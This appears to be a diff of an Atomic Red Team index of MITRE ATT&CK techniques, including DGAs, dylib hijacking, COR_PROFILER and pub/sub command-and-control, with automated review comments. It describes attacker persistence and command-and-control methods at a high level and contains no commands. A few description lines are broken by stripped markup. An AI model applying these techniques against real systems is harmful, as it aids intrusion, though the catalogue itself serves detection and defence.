+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
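Review bot: the two NetSPI references are re-pointed from `blog.netspi.com/...` to the `www.netspi.com/blog/technical-blog/...` paths with the retrieved date updated to September 12, 2024, which is right, but the two `docs.microsoft.com` links in the same list still carry `?view=sql-server-2017`, an old documentation view, so while the list is being refreshed they are worth updating too. Separately, deleting `x_mitre_permissions_required` (`Administrator`, `SYSTEM`, `root`) removes the only field in this object stating that the technique needs sysadmin-level rights on the database server, and the detection text visible here does not say so; consider whether that requirement should survive somewhere in the object.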
@@ -36014,7 +36446,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36038,12 +36470,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36127,11 +36557,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36183,9 +36612,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36234,7 +36662,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36272,14 +36700,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
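Review bot: for T1574.012 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted with no replacement visible in the hunk, whereas for T1078.003 a few hunks up the spec version is kept and bumped (`- x_mitre_attack_spec_version: 3.1.0` / `+ x_mitre_attack_spec_version: 3.2.0`) and only `spec_version` is dropped. Please confirm that `x_mitre_attack_spec_version` is still emitted elsewhere in the T1574.012 and T1205.002 objects, or that no index consumer keys on it. Dropping `spec_version` across the file is fine for Atomic Red Team's own tooling, but `spec_version` is a required property on STIX 2.1 objects, so anything that re-serialises these entries as STIX would need it restored.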
@@ -36342,7 +36768,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -36400,97 +36825,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
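Review bot: most of this T1568.002 hunk is key reordering (`x_mitre_platforms`, `x_mitre_domains`, `id`, `object_marking_refs` and `external_references` change position, and every reference flips from `url`-first to `description`-first), which buries the substantive changes: `x_mitre_version` 1.0 to 1.1, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, new `revoked: false` and `x_mitre_deprecated: false` keys, removal of `x_mitre_permissions_required: - User`, and the Akamai citation URL moving from `https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html` to a `medium.com/@yvyuz` post. Consider having the generator emit keys in a fixed (or sorted) order so future regenerations diff cleanly, and please confirm the Akamai URL change comes from the upstream ATT&CK data rather than a manual edit, since a personal Medium post is weaker provenance than the vendor blog for a detection reference.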
@@ -36556,9 +36979,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
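Review bot: in the new T1071.005 entry the description is split oddly: the lines `, XMPP`, `,`, `, and STOMP` and `use a publish/subscribe design,` appear without the `+` prefix in the middle of an added block, and `MQTT` and `AMQP` sit alone at the end or start of their lines. As rendered, the protocol names look like inline markup that was stripped, so please check the raw file: the loaded string should read "Protocols such as MQTT, XMPP, AMQP, and STOMP use a publish/subscribe design", and the double-quoted YAML scalar must still parse as one value. The empty `x_mitre_detection: ''` and `atomic_tests: []` are consistent with this being new upstream content without tests yet, and the `publishing/subscribing` wording added to the T1071 parent description further down matches this sub-technique.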
@@ -36604,7 +37085,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -36636,7 +37116,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -36658,22 +37138,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -36695,7 +37173,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -36720,7 +37198,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -36804,7 +37281,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -36868,11 +37344,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -36956,7 +37431,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -36987,7 +37461,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37007,8 +37481,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37030,8 +37504,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -37093,7 +37565,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37141,7 +37612,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37195,7 +37665,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37228,7 +37697,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
